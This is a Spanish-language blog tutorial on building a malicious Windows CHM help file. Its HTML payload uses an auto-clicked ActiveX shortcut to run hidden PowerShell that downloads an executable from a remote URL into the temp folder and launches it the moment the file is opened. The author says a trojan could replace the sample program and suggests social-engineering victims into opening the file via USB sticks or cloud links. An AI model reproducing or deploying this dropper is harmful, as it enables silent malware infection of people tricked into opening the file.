Se trata de que se ejecute una aplicación automáticamente luego de abrir un archivo de extensión "CHM" (Microsoft Compiled HTML Help), no se quien es el autor de esta idea así que voy a citar a algunas fuentes de donde saque la información.
Como crear un archivo CHM
http://www.elguille.info/hhw/dnm/default.aspx
Run calc.exe via open CHM file
https://twitter.com/ithurricanept/status/534993743196090368
Infection par les fichiers d'aide (.chm)
http://rootsheep.info/2015/03/11/infection-par-les-fichiers-daide-chm/
A continuación mostrare la creación del archivo, lo hice desde una maquina Windows 7:
1.- Primero debemos descargar la aplicación, HTML Help Workshop, lo hacemos desde el sitio oficial de Microsoft y la instalamos.
O descargamos desde mi repositorio.
2.- Abrimos HTML Help Workshop.
3.- Creamos un nuevo proyecto y seguimos los siguientes pasos:
Recuerda es con extensión "HHP"
4.- Creamos un archivo HTML con la siguiente información dentro de el:
<HTML>
<TITLE>CHM Prueba de Concepto hackfu0.blogspot.com</TITLE>
<HEAD>
</HEAD>
<BODY>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -WindowStyle hidden -command (new-object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe',$env:temp+'\archivo-hackfu0.exe');start-process $env:temp\archivo-hackfu0.exe">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
<A name=contents>
<H2 align=center>Download file and run it with chm.</H2>
<P></A>
<H3 ALIGN=CENTER>BY HACKFU0</H3><P>
</BODY>
</HTML>
Explicación: si nos fijamos en lo principal que hará este archivo será descargar el archivo Putty.exe desde la pagina oficial (puede ser cualquier .exe), lo va a guardar en Temporales con otro nombre y luego lo va a ejecutar, todo esto lo hace automáticamente al abrir el archivo CHM, no es necesario hacer clic.
5.- Le indicamos la ruta de nuestro archivo HTML que contiene el texto anterior.
Y terminamos con la creación del archivo.
6.- Luego Compilamos el Proyecto:
7.- Se compila y guarda en la ubicación que le indiquemos, luego vamos y ejecutamos el archivo CHM creado por nosotros:
8.- Finalmente observamos que se ejecuta el Putty de forma automática y que en la carpeta Temporal se crea el archivo que especificamos en la creación del archivo HTML.
Conclusión. Fácilmente podríamos colocar un troyano en vez del Putty e infectar a alguna persona, lamentablemente algunos servidores de correo electrónico no permiten el enviar ni recibir este tipo de extensiones (CHM), pero a través de Ingeniería Social podríamos convencer a alguien de que lo abra a través de un Pendrive o que lo descargue y abra desde algún enlace en la nube, opciones hay muchas la creatividad es tuya.
No me hago responsable del uso que se le de a este tutorial.
Hackfu0
No hay comentarios:
Publicar un comentario